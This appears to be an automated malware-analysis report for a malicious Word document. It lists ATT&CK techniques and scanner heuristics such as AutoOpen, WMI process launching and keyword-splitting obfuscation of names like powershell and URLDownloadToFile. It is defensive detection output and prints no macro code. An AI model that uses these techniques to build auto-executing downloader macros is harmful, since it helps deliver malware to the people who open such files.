Verdict: MALICIOUS
Risk Score: 342
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample contains a VBA macro with an AutoOpen function, a common technique for malicious documents. Critical heuristics indicate the use of WMI (Win32_Process) to launch processes, and obfuscation techniques were used to hide the API name. This suggests the macro is designed to download and execute a second-stage payload.
Heuristics (9)
- ClamAV: Doc.Downloader.00536d-6862699-0 (critical) CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.00536d-6862699-0
- VBA macros detected (medium, 5 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- VBA WMI Win32_Process launcher (critical) OLE_VBA_WMI_PROCESS_CREATE: VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- Dangerous API name reassembled from split string literals (critical) OLE_VBA_SPLIT_KEYWORD_OBFUSCATION: VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
- AutoOpen macro (high) OLE_VBA_AUTOOPEN: AutoOpen macro
- GetObject call (high) OLE_VBA_GETOBJ: GetObject call
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 54276 bytes |

SHA-256: b5e5038b1fe4ebcdb09e8693d1f8e1d3e1d4e1fba0a7f12051d97c9e566e09e1

Preview script: first 1,000 lines of the extracted script